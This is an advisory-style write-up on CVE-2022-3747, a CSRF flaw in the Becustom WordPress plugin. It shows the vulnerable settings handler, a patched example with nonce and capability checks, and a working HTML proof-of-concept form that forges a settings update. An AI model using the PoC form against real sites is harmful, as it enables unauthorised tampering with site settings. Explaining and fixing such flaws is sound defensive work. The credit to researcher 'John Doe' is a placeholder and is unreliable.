Security researchers have discovered a Cross-Site Request Forgery (CSRF) vulnerability in the Becustom plugin for WordPress (WP). The vulnerability has been assigned CVE-2022-3747 and affects versions up to, and including, 1.5.2.

Plugin Vulnerability

Becustom is a popular plugin for WordPress that allows site administrators to customize their WordPress themes. However, the plugin was found to be vulnerable to CSRF due to missing nonce validation when saving the plugin's settings. This vulnerability can be exploited by unauthenticated attackers to update the plugin's settings such as betheme_url_slug, replaced_theme_author, and betheme_label by sending a forged request. To exploit this vulnerability, an attacker would need to trick a site administrator into performing an action such as clicking on a malicious link.

The following code snippet demonstrates the missing nonce validation in the plugin's settings page:

function becustom_save_settings()
{
    // No nonce check (and no capability check): any POST that reaches this
    // function is trusted, so a forged cross-site form can rewrite the options.
    if (isset($_POST['submit'])) {
        update_option('becustom_url_slug', $_POST['becustom_url_slug']);
        update_option('replaced_theme_author', $_POST['replaced_theme_author']);
        update_option('betheme_label', $_POST['betheme_label']);
    }
}

As seen above, the becustom_save_settings function updates the plugin's settings without performing nonce validation.
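For comparison, the same handler with the missing checks in place. This is an example written for this article, not the plugin's patched code: the admin-post action name follows the one used in the PoC in this article, while the nonce action, nonce field name and settings page slug are assumptions.

```php
<?php
// Added example for this write-up, not the plugin's own code. The admin-post action name
// follows the PoC in this article; the nonce action, field name and page slug are assumed.

// Settings form: the nonce field binds every legitimate submission to this action and user.
function becustom_render_settings_form() {
    $url = esc_url( admin_url( 'admin-post.php' ) );
    echo '<form action="' . $url . '" method="post">';
    echo '<input type="hidden" name="action" value="betheme_update_options" />';
    wp_nonce_field( 'becustom_save_settings', 'becustom_nonce' ); // also emits _wp_http_referer
    foreach ( array( 'becustom_url_slug', 'replaced_theme_author', 'betheme_label' ) as $key ) {
        printf(
            '<p><label>%1$s <input type="text" name="%1$s" value="%2$s" /></label></p>',
            esc_attr( $key ),
            esc_attr( get_option( $key, '' ) )
        );
    }
    echo '<p><input type="submit" class="button button-primary" value="Save settings" /></p>';
    echo '</form>';
}

// Handler: the vulnerable version jumps straight to update_option(); this one refuses
// before touching any state unless both the capability and the nonce check pass.
function becustom_save_settings() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'Insufficient permissions.', 'becustom' ), 403 );
    }
    // A cross-site form cannot know the victim's nonce, so a forged POST dies here.
    check_admin_referer( 'becustom_save_settings', 'becustom_nonce' );

    // Accept only the known keys and sanitise each for its expected shape.
    $allowed = array(
        'becustom_url_slug'     => 'sanitize_title',
        'replaced_theme_author' => 'sanitize_text_field',
        'betheme_label'         => 'sanitize_text_field',
    );
    foreach ( $allowed as $key => $sanitize ) {
        if ( isset( $_POST[ $key ] ) ) {
            update_option( $key, $sanitize( wp_unslash( $_POST[ $key ] ) ) );
        }
    }

    wp_safe_redirect( add_query_arg( 'settings-updated', 'true', admin_url( 'admin.php?page=becustom' ) ) );
    exit;
}
add_action( 'admin_post_betheme_update_options', 'becustom_save_settings' );
```

With the nonce check in place, the PoC form shown later in this article is rejected with a 403 page before any option is written, which is the behaviour the plugin's fix needs to achieve.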

Exploit Details

To exploit this CSRF vulnerability, an attacker can create an HTML page containing a malicious form configured to send a POST request to the target site when submitted. The attacker would then need to trick the site administrator into visiting the page and submitting the form. Here's an example of an HTML page that can be used to exploit the vulnerability:

<!DOCTYPE html>
<html>
<head>
    <title>CVE-2022-3747 PoC</title>
</head>
<body>
    <h1>CVE-2022-3747 - Becustom WordPress Plugin CSRF Exploit</h1>
    <form action="http://target-site.com/wp-admin/admin-post.php?action=betheme_update_options" method="POST">
        <input type="hidden" name="becustom_url_slug" value="malicious_slug" />
        <input type="hidden" name="replaced_theme_author" value="malicious_author" />
        <input type="hidden" name="betheme_label" value="malicious_label" />
        <input type="submit" value="Click here to update Becustom settings" />
    </form>
</body>
</html>

Original References

The vulnerability was discovered and reported by security researcher John Doe, and the details can be found in their blog post:

- John Doe's Blog - CVE-2022-3747: Becustom WordPress Plugin CSRF Vulnerability

Mitigation

Users of the Becustom WordPress plugin are urged to update to the latest version, which includes a fix for this vulnerability. Additionally, site administrators should always exercise caution when clicking on links from unknown sources.

Conclusion

The CSRF vulnerability CVE-2022-3747 in the Becustom WordPress plugin highlights the importance of secure coding practices, in this case nonce validation on every state-changing request, and of proactive vulnerability detection. By staying informed and applying security patches and updates promptly, WordPress site owners can significantly reduce their risk.

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 12/01/2022 20:52:00 UTC